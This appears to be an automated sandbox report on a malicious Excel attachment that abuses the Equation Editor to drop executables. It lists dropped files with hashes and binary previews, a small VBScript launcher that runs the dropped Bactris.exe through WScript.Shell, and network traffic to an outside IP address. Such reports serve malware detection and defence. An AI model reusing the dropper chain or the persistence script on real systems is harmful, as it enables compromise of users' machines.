                                                                                                                                              Preview:EA06.....C..zm..0.P..].oT..i.zp.....(...R..!.....U...ZW.sN..?.?..3....)5..<.J.S9u.m$.Vgs....n..+.)T.......i..`.P'W`.....H..w..F.99\7E.m.v.LT.@.Il..P..h......./+.....}v....6.|.... k.9.D..B.....+......,..a..J....".. k|....i..R ....U%..8 ...n!O......&..xk]A..k4*EV.*.U)t:h....Qj.Z@.......J...V..JuV..AU.tp..]h.zu....z..K.......V.@...^...wI.....N.U..`>m."o.......V..A.g...X.@....P..t.u].p.C.M.r...>.R.(11..h......7.Yd..AM.y'@.. .@..x.z@......n..<.C$..!.....J.T.....b....P.K,.GD..k`...aT......,.C.._$...W7.^......G. f....R.'.Qe......@r......E..P|....U;..0....B.@_...@.........?.....p.jf3...]].Gf....7.........P.:<..N.......-..^.t..ON..e..5.{u..*.,...^.u(.........r.@E......&.....R...tZ.~.4.S..k.:a......y.....h4..R..,tj./..@$.D..@..H8{...'.z.p...ar.R.{d..M.y..Z.s7..AbT....L.N....a..R*.o.....G.0.......`<.0.. ..`.i...I..f..........2.U.....^.+...b.9......P........`..........M......6P......P........h....F.(..>.0.`@(.M....f......*.V;...Z.n..k....................@..(9k
                                                                                                                                              Process:C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):9940
                                                                                                                                              Entropy (8bit):7.604277577483741
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:m+cKjLMiz/tlNOVZOZIbgiQ+VjN7yObFOhgxe4rTKwvuEQxB2XQeyfSxKiw:97jwiz/tlUVZOggizjNMaJiwvcaWfIKj
                                                                                                                                              MD5:33EF5FF3683E9521D0D673AE23B45E97
                                                                                                                                              SHA1:DA97189F0AF2DAA97C777863CDA46B19EFE53A63
                                                                                                                                              SHA-256:7FE77D32141C1F66DE426ACAF52B096FA8991CB6DBEFF2A0F461F446A8632733
                                                                                                                                              SHA-512:73C49017A7D7D7B3CEEC6E03E0DC07AA4F0D2D5A2A4C9D22290B383AE8D62D21F82A0D2B7271C013078F939D29ABFF3BFFC5FC8A2D6C46FDA72F91287A881C83
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...
                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x33b00c01, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):21037056
                                                                                                                                              Entropy (8bit):1.1388600072440405
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:oO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:oOEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                              MD5:FC3F1E2F896AAD002E649927D559BF10
                                                                                                                                              SHA1:98D160C1EBA725D674E43561EF1A41783EA42A2A
                                                                                                                                              SHA-256:ABFD02FDA1A9AE62F7B67D2F7B5234A3D2B415B4969D2F103A54E7A1DE55F86A
                                                                                                                                              SHA-512:AD0AE4C3F86940045213846C03405F843E5E05847ABB28A12B07C82F42712FA9469953A3A9E12FE476A7F8002D6A678B2BEF6F2F9FD36B99FEA66FD027D050D3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:3...... ........................u..............................;:...{...:...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3039004, page size 2048, file counter 11, database pages 51, cookie 0x5a, schema 4, UTF-8, version-valid-for 11
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):106496
                                                                                                                                              Entropy (8bit):1.2251184767067138
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:jpqGfZM7TJkb3dS9gnTPxbH9q+6cEuEHVuHgslQxC:jpqzuSWnTJD9q+MHVuHpKx
                                                                                                                                              MD5:C70CFAD67540844C840E01DFE5EAB956
                                                                                                                                              SHA1:000A9A4E44F55D996A112BDCD4B33FFFF6686A9C
                                                                                                                                              SHA-256:91B4A09F472412B071A4BB0F3EDA19B3802BA04E0654B889454A0F71E0927117
                                                                                                                                              SHA-512:7030E6481FB71CABA765D879BBB00908E8414F2C78D82E0D4539B49415C2EACFB764CA350F5B8E126828E2042E2B00219D5E43FC8CEAD70655439ED45E4F936E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ .......3...........Z......................................................_............3........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3039004, page size 2048, file counter 4, database pages 23, cookie 0x23, schema 4, UTF-8, version-valid-for 4
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49152
                                                                                                                                              Entropy (8bit):0.7761817078691606
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:k+PLKlG9Me7mlcwCqPmQKLq8tObn8MouO:fPLKlGgcMKa7
                                                                                                                                              MD5:1C3541AE5A2091BBB788E7316B8B4E93
                                                                                                                                              SHA1:27087295F197DCAD7062EB1CCA09334C1933236A
                                                                                                                                              SHA-256:F99A92EF26674F0E9BD9E89DEF7C31AB032B091433292D5F0F8D2F89BCD8CE0F
                                                                                                                                              SHA-512:09AABF3823A43E7683DAFFE596C041C6CE19E63C9E9F2BB7A72B84C54269941A6EC7C6EAB80F7F5E494AC10C09398C0846AD385D60BC6738E84F85D14EF25AD8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:SQLite format 3......@ ...................#......................................................_.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\YED.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):494592
                                                                                                                                              Entropy (8bit):7.6245065734246245
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:rm/zGgKDO6f9JWgMtuwCj4oBdRQUzWoJg8mt5w+:eCg+fGFuwCjVRPnmt5w+
                                                                                                                                              MD5:C877ED9D175FBAC9D438C1EBD391C5A9
                                                                                                                                              SHA1:8DFF40C8996163310C8D6E52AB1C4A4B90AE6309
                                                                                                                                              SHA-256:6690C74313D3EF0180CEC199977221A52A15AD346B7DA5F1E73417B74BA7B961
                                                                                                                                              SHA-512:01F9581EDD31DC5C197BA6C0086F71945677EDCDBC5F83B4A05632694F6F3AC58F48AF2A29129029D94C01970DCAC2C232ACEAF830815650C4B747558CE0122B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...7MAM0VCFU..7T.UO7NAM0.CFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUUY7TEJ.9N.D.s.G..yc<"&oG<.*B3.f6$6Y;?u-Rn38^r*(u..dt&:+R`L@:vCFUEX7TG......N...+...*.3kI...N.%`+...*.3hI...N...+...*..]I...N..*...*..H<..N..*/..*...I...N...+0..*..Hb..N..l+...*..H...N.*%=...*KUO7NAM0RCFUEX7T..O7.@J0.r.0EX7TKUO7.AO1YBHUE*2TKCM7NAM0..EUEH7TK.J7NA.0RSFUEZ7TNUN7NAM0WCGUEX7TKuG7NEM0RCFUGX7.KU_7NQM0RCVUEH7TKUO7^AM0RCFUEX7T.I7J@M0R.AU..7TKUO7NAM0RCFUEX7TK.H7.zM0..@U}X7TKUO7NAM0RCFUEX7T..I7VAM0*.@U.X7TKUO7NAM0R.CU.\7TKUO7NAM0RCFUEX7TKUO7NAM0|7#-1X7T>$J7NQM0R1CUE\7TKUO7NAM0RCFUeX74e'+V: M0.:GUE.2TK/N7N7H0RCFUEX7TKUO7.AMp|''!$X7T..O7NQJ0RMFUE.1TKUO7NAM0RCFU.X7.e!#DNAM0[CFUE(0TKWO7N.K0RCFUEX7TKUO7.AM.|$ <!+7T{WO7N.J0RGFUEX0TKUO7NAM0RCFU.X7.e'<E-AM0..FUE.0TK.O7NEJ0RCFUEX7TKUO7.AMp|1#9*;7T.nO7N.J0R.FUE.0TKUO7NAM0RCFU.X7.KUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0
                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2
                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..
                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):165
                                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\YED.exe
                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):108357120
                                                                                                                                              Entropy (8bit):7.999496835019783
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:98304:VjTQYxsWR96TM6WPPRhlUtfFJs23ArLES1eS+0r3f6RXe7oRpJJbCsJ3bMfebIGU:V3dxf36ZWhotta+0rfnoRnaTJ4GV
                                                                                                                                              MD5:A8004A594D5D55F5A5F5ABDBB8001FA9
                                                                                                                                              SHA1:CBC9AA5D01128A10A82F22145C21E1837EBB7EC3
                                                                                                                                              SHA-256:8905FA86EF9A74F2A983710249BDD67ED97A8FF0F73828C1B9AFEC8D153F5BAB
                                                                                                                                              SHA-512:AD6537E5DA31EEA38A1C8CAF515C1EA861DBB9B1883298FFCB823D42E17AF291ABD8EB376D0823AEE2285C8C5C36F234FA7BFE61557787E425091AE9B6E75C2F
                                                                                                                                              Malicious:true
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....2f..........".................w.............@.......................................@...@.......@.....................d...|....@.......................@...u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u...@...v..................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):276
                                                                                                                                              Entropy (8bit):3.4373911393705248
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:DMM8lfm3OOQdUfcltr1UEZ+lX1AlRchj5nriIM8lfQVn:DsO+vNlZ1Q1AlR05mA2n
                                                                                                                                              MD5:F8DCB60EE8BC14C96632E7FA13344239
                                                                                                                                              SHA1:7C687E02238728059F944246C78BFC6D4EC8347B
                                                                                                                                              SHA-256:BB26FF2B8FE0C4B3429FC243A24AC2AE84468EBA57B6EA39DA01E6A869063D93
                                                                                                                                              SHA-512:F6E6D3A736B9EE41725B385F1213F8BC6134F8AEA932E9E0FBC02BF4D4E68A0FD4DD8A49000E04580E3F2AEDFDCD740D2D7D9FC350EDD82A47E28C7F799FAE5A
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.e.u.p.o.l.y.z.o.a.n.\.B.a.c.t.r.i.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1402368
                                                                                                                                              Entropy (8bit):7.165354738478778
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:pqDEvCTbMWu7rQYlBQcBiT6rprG8awSAxyHE9EjgjebQV:pTvC/MTQYxsWR7awZx4/Ml
                                                                                                                                              MD5:9ABB13386C543EB5FEA7DEA95EB86D26
                                                                                                                                              SHA1:397BD9E254C1A4E791BC449AFB720AD6AF8378B0
                                                                                                                                              SHA-256:43AAADAA21A6510FA285363CF04C9E240954C750872CA1E105261E165B9E49DB
                                                                                                                                              SHA-512:62CE7FDD09881486C34888145AA94306DF16D169132ED7B9AC4AEBD805D9C37E775AFC8F99FA3813FAA42B40923C2796A5A81881E8CF7A2E2FB6DB047DCF0B8B
                                                                                                                                              Malicious:true
                                                                                                                                              Antivirus:
                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....2f..........".................w.............@.......................................@...@.......@.....................d...|....@.......................@...u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u...@...v..................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):144
                                                                                                                                              Entropy (8bit):6.635067015271115
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:u5eM755JlrAcMERa0MQps3ZBzP2YJz95Z7OfqN4iPJRhZNNAn:u5J53UcMTaWJFP2U5Z7wqxJRhW
                                                                                                                                              MD5:96E3B96670F45FBE2F3B22802DAB32B9
                                                                                                                                              SHA1:F041C04B581FB2469D49A47DEE04BB4D79B8F9F7
                                                                                                                                              SHA-256:43C19920723E4DEDA0DF54B2C73D099FDE9A4CD66C7865E876A006BB0BD6592E
                                                                                                                                              SHA-512:C8CC434B082A0CE899A7A3397E59C2F76FE4F5F77CC4A93C7DDE5A7A2C6192AAE8F9D5771F7938F92697D3A830D3C44A41D56DD1FC37B3E84A310B12AF98F049
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.D{6............x.X"..`...Y.O.yv..7E....,.....X5.q..i5&....mO..b....R....hV...5.r.M.z.C..@j.g.#....FPc..-r..[!........]........._.c......{.
                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):165
                                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):165
                                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (4122)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):4127
                                                                                                                                              Entropy (8bit):6.004614369885366
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:xf/gi3m0xXExDYNbeS3Yi8NsI67zNxyWkrrjkXsffQffL:xQ+mdoeeKN67zsrol
                                                                                                                                              MD5:8BA399134034A8EF0ED5546316BB8D99
                                                                                                                                              SHA1:A97A3022411DDCF96D654F5BB54D24A14A1FD0B1
                                                                                                                                              SHA-256:180231C9EAAD9CDD3B41BF62DF1414027FBFE2E765FCCD5A4F8F47DE529B978B
                                                                                                                                              SHA-512:13B413FB6DA6B2590EA55D3442C7C79BB51D097D77900D5188C418DC5C5C9B5A214D78700D90916D663751CDC62B56F15E029C8D1BCBDDEBB43969141EAE1F92
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                              Preview:)]}'.["",["nyt crossword clues","fishing guide stellar blade","federal reserve interest rates","drake maye","fortnite restored reels dance floor","soviet era combat aircraft","google layoffs mexico","deebo samuel"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"pre":0,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"a":"Football quarterback","dc":"#424242","i":"data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBwgHBgkIBwgKCgkLDRYPDQwMDRsUFRAWIB0iIiAdHx8kKDQsJCYxJx8fLT0tMTU3Ojo6Iys/RD84QzQ5OjcBCgoKDQwNGg8PGjclHyU3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3N//AABEIAEAAQAMBIgACEQEDEQH/xAAbAAACAgMBAAAAAAAAAAAAAAAABQYHAwQIAv/EADMQAAIBAwIEBQIFAwUAAAAAAAECAwAEEQUhBhIxQQcTYXGBUZEyQqGxwTRy4RQiIyYz/8QAGQEAAgMBAAAAAAAAAAAAAAAAAwQAAQUC/8QAIREAAgIDAAEFAQAAAAAAAAAAAQIAAwQRITESEyJRYQX/2gAMAwEAAhEDEQA/ALxoooqSTQ1vV7HQtNm1HVJ1gtoRlmO5J7ADuT9Kozijxj1rULn/AK/nTLNfwl4
                                                                                                                                              File type:Microsoft Excel 2007+
                                                                                                                                              Entropy (8bit):7.99777773343233
                                                                                                                                              TrID:
                                                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                              • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                              File name:202404294766578200.xlam.xlsx
                                                                                                                                              File size:620'921 bytes
                                                                                                                                              MD5:9336f772a40e762cc855b7c9b75b1d28
                                                                                                                                              SHA1:837d90dbe2f9c267e26ad4e170b7bd03d199f335
                                                                                                                                              SHA256:ca377ebfd8e0d57754a3780b6b7360a76efad94c8d5753e172a52802bf109ddc
                                                                                                                                              SHA512:c9d7e7b081ec7360a0f473e2eac01c821b0fbf824d0973eacd6cd0e687f04723df63297a28d4b20ae65948c89560c0b6ce644deee90ef3ac78b15bbeb20b0f1c
                                                                                                                                              SSDEEP:12288:T6nWUgUjdBVpgh0TL1ftjVi7oToJcMAr7pVFMqe2nH61vSp3qE/8LOKqYsN5/:+QWVWYVoZAnP42n4KZX/8LtqYEx
                                                                                                                                              TLSH:FCD433E5226637861B0814E4FCE77D4962776D2C62821CCF3A3A091878F1CCFDA2B756
                                                                                                                                              File Content Preview:PK........X].X.M.8............[Content_Types].xmlUT....*2f.*2f.*2f.U.n.0....?.........J.Y.E..H...9.hq..x.....(...!_.....q....F.l.>HkJrQ.H..[!MS......d!2#...J..@no....l....&......4..4..u`0R[.Y.W.P.x.........D01.......fo*f...<TRIC..!/I..9.$g..te.'..... ,...
                                                                                                                                              Icon Hash:2562ab89a7b7bfbf
                                                                                                                                              Document Type:OpenXML
                                                                                                                                              Number of OLE Files:1
                                                                                                                                              Has Summary Info:
                                                                                                                                              Application Name:
                                                                                                                                              Encrypted Document:False
                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                              Contains Workbook/Book Stream:False
                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                              Contains ObjectPool Stream:False
                                                                                                                                              Flash Objects Count:0
                                                                                                                                              Contains VBA Macros:False
                                                                                                                                              Author:SHINY
                                                                                                                                              Last Saved By:X10LUXURY
                                                                                                                                              Create Time:2010-06-04T08:55:28Z
                                                                                                                                              Last Saved Time:2023-07-30T22:56:25Z
                                                                                                                                              Creating Application:Microsoft Excel
                                                                                                                                              Security:0
                                                                                                                                              Thumbnail Scaling Desired:false
                                                                                                                                              Company:Grizli777
                                                                                                                                              Contains Dirty Links:false
                                                                                                                                              Shared Document:false
                                                                                                                                              Changed Hyperlinks:false
                                                                                                                                              Application Version:15.0300
                                                                                                                                              General
                                                                                                                                              Stream Path:\x1oLe10NAtIVe
                                                                                                                                              CLSID:
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:882522
                                                                                                                                              Entropy:5.8441392306296285
                                                                                                                                              Base64 Encoded:True
                                                                                                                                              Data ASCII:. . Y S . . . B . > / g + . . . U . r - . r ( @ R A . 5 - 1 ; Z & . . 0 l } f 4 } . > f 7 \\ ! . . \\ 7 ; 6 @ s . J . H R + d : r $ L B L . . j . . M _ . o U . s . @ . : x E 4 X . P 5 : \\ I . . . . . 0 ' d @ . P . . R J . . . ^ . . ) G . . G Y C / g + q / . + 6 ; . b Y > R Q . U g _ > . . . . \\ 7 3 . r C ? W . + . G . . A J k q 6 n { . = . ~ % ( . r / J i + 5 k 9 s . $ ? . Z Q Z . B $ { M . i M . D C 6 2 . q { . W A z ~ . . . N . L . ~ V ~ | \\ . I ` W c . d 3 . . V . . r < $ i Q ! . Q . 2 F . e l . H . / . u
                                                                                                                                              Data Raw:f0 ba b3 01 02 59 a4 a7 88 53 01 08 ce a3 be c3 42 ba ff f7 d6 8b 3e 8b 2f be fa e7 67 2b 81 e6 b4 7f d6 90 8b 16 55 ff d2 05 c5 72 8a cc 2d 1f 72 8a cc ff e0 b4 28 40 c2 ee 52 c7 41 00 35 fb 2d 31 dd 3b ab 5a 26 14 1a 30 ab 6c 7d 66 34 c6 7d 12 3e df 66 37 5c 21 af 89 0b c3 84 5c f4 37 3b a0 fe cd c9 c8 36 40 73 11 4a e0 f6 ed 1d 48 52 2b 64 3a ea 72 24 f3 b9 ca e1 4c 42 dc c5 4c
                                                                                                                                              General
                                                                                                                                              Stream Path:FOc7Z7di34r
                                                                                                                                              CLSID:
                                                                                                                                              File Type:empty
                                                                                                                                              Stream Size:0
                                                                                                                                              Entropy:0.0
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:
                                                                                                                                              Data Raw:
                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              May 2, 2024 04:54:52.862775087 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:52.972450018 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:52.972551107 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:52.973706007 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.083898067 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.083945990 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.084021091 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.084120989 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.084146023 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.084202051 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.193768978 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.193792105 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.193803072 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.193815947 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.193828106 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.193891048 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.193905115 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.193916082 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.193942070 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.193942070 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.195595980 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.303776026 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.303793907 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.303824902 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.303868055 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.303905964 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.303919077 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.303934097 CEST804916123.94.54.101192.168.2.22
                                                                                                                                              May 2, 2024 04:54:53.303965092 CEST4916180192.168.2.2223.94.54.101
                                                                                                                                              May 2, 2024 04:54:53.303967953 CEST804916123.94.54.101192.168.2.22
